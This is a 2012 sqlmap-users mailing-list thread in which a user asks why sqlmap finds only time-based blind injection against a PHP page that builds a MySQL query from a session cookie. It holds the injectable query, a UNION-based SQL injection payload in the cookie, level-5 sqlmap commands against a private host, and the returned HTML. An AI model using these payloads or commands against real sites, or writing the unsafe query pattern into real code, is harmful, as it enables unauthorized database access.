Hi,
This is the HTML from a manual request with sesh cookie set
to ')%20UNION%20select%201,2,3,4%20--%20
<html>
<head>
<link rel='stylesheet' href='css/styles.css'/>
<title>My Account - Customer Care Centre - Acme Power Co</title>
</head>
<body>
<div id='heading'>
</div>
<div id='menu'>
<a href='index.php'>Home / Login</a> -
<a href='account.php'>My Account</a> -
<a href='support.php'>Contact Support</a> -
<a href='#'
onClick='javascript:window.open("hours.php?data=ccc","newwin","width=210,height=200")'>CCC
Opening Hours</a> -
<a href='logout.php'>Logout</a>;
</div>
<div id='content'>
<div id='billz'>
Hi, 2!<br><br> Have a token: 86a2aeef8813bfa37a354e8997c77388<br><br>Please
find below your account statement, released 04 November 2011. This account
is due to be paid on <b>05 November 2011</b>. Failure to pay this amount
before the due date may result in service disruption.<br><br><h3>Account
Statement</h3><hr><table><tr><td width=200>Account Number</td><td
width=450>Description of
Service</td><td>Amount</td></tr></table><hr><table><tr><td
width=200>1</td><td width=450>Basic Power
Service</td><td>4</td></tr></table>
</div>
</div>
</body>
</html>
---------------------------
The relevant bits being "Hi, 2", and the table showing amount of "4" etc.
Thanks,
ss23
On Mon, Sep 17, 2012 at 6:58 AM, Miroslav Stampar <
miroslav.stam...@gmail.com> wrote:
> Hi Stephen.
>
> From this traffic file it's not really clear if this is exploitable by any
> mean more than time-based.
>
> Could you please send the response you get when you "manually exploit" it
> with the payload you've mentioned:
> "sesh=')%20UNION%20select%201,2,3,4%20--%20" ?
>
> Kind regards,
> Miroslav Stampar
>
>
> On Sat, Sep 15, 2012 at 1:33 AM, Stephen Shkardoon <s...@ss23.geek.nz>wrote:
>
>> It ran a little over and started testing User-Agent, but it has the
>> entire log for the session cookie there.
>> The options I used this time were:
>> python2 sqlmap.py -u "http://10.100.0.26/account.php"; --cookie="sesh=1"
>> -t traffic.txt --level=5
>>
>> Thanks,
>> ss23
>>
>>
>> On Sat, Sep 15, 2012 at 10:31 AM, Miroslav Stampar <
>> miroslav.stam...@gmail.com> wrote:
>>
>>> Hi.
>>>
>>> In that case could you please send the sqlmap traffic file got by using
>>> -t traffic.txt along with your standard switches/options?
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>>
>>> On Sat, Sep 15, 2012 at 12:09 AM, Stephen Shkardoon
>>> <s...@ss23.geek.nz>wrote:
>>>
>>>> Hi,
>>>>
>>>> Sorry, my mistake. I just copied the line and altered it to show that
>>>> the cookie was being used. In the real script, there was no parse error.
>>>> Nonetheless, sqlmap cannot pull out results.
>>>>
>>>> Thanks
>>>> ss23
>>>>
>>>> On Sat, Sep 15, 2012 at 9:55 AM, Miroslav Stampar <
>>>> miroslav.stam...@gmail.com> wrote:
>>>>
>>>>> Hi.
>>>>>
>>>>> I am not sure how are you able to "definitely able to pull out
>>>>> results" as as I can see the problem lies in used PHP (enclosed pair of
>>>>> single quotes with another pair of single quotes):
>>>>>
>>>>> Bad:
>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>> sessionid = *'$_COOKIE['sesh']'*)");
>>>>>
>>>>> Good 1:
>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>> sessionid = *'$_COOKIE[sesh]'*)");
>>>>>
>>>>> Good 2:
>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>> sessionid = " . *$_COOKIE['sesh'] . "*)");
>>>>>
>>>>> With that code of yours you should get an ugly PHP error message:
>>>>> "Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE,
>>>>> expecting T_STRING or T_VARIABLE or T_NUM_STRING"
>>>>>
>>>>> Also, you could take a look at similar case here [1].
>>>>>
>>>>> Kind regards,
>>>>> Miroslav Stampar
>>>>>
>>>>> [1]
>>>>> http://www.hotscripts.com/forums/php/21179-php-parse-error-parse-error-unexpected-t_encapsed_and_whitespace-expecting-t_strin.html
>>>>>
>>>>> On Fri, Sep 14, 2012 at 8:08 PM, Stephen Shkardoon
>>>>> <s...@ss23.geek.nz>wrote:
>>>>>
>>>>>> Hi all,
>>>>>>
>>>>>> Trying to do a (simple) injection with sqlmap, and I can't seem to
>>>>>> coax it into getting it right.
>>>>>> The PHP source looks something like:
>>>>>>
>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu
>>>>>> WHERE
>>>>>> sessionid = '$_COOKIE['sesh']')");
>>>>>>
>>>>>> and then it displays the fields it pulled out.
>>>>>>
>>>>>> The command(s) I've tried look something like ./sqlmap.py -u
>>>>>> site.com/script.php --cookie="sesh=1" --cookie-urlencode --level=5
>>>>>> --risk=5. However, the only injection point it finds is AND/OR time-based
>>>>>> blind, which is horribly slow. Of course, manually, I can do a
>>>>>> sesh=')%20UNION%20select%201,2,3,4%20--%20 or similar, so
>>>>>> I'm definitely able to pull out results.
>>>>>>
>>>>>> Anything I can do to push sqlmap in the right direction?
>>>>>>
>>>>>> Thanks,
>>>>>> ss23
>>>>>>
>>>>>>
>>>>>> ------------------------------------------------------------------------------
>>>>>> Got visibility?
>>>>>> Most devs has no idea what their production app looks like.
>>>>>> Find out how fast your code is with AppDynamics Lite.
>>>>>> http://ad.doubleclick.net/clk;262219671;13503038;y?
>>>>>> http://info.appdynamics.com/FreeJavaPerformanceDownload.html
>>>>>> _______________________________________________
>>>>>> sqlmap-users mailing list
>>>>>> sqlmap-users@lists.sourceforge.net
>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>
>>>>>>
>>>>>
>>>>>
>>>>> --
>>>>> Miroslav Stampar
>>>>> http://about.me/stamparm
>>>>>
>>>>
>>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>>
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
------------------------------------------------------------------------------
Everyone hates slow websites. So do we.
Make your web apps faster with AppDynamics
Download AppDynamics Lite for free today:
http://ad.doubleclick.net/clk;258768047;13503038;j?
http://info.appdynamics.com/FreeJavaPerformanceDownload.html
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
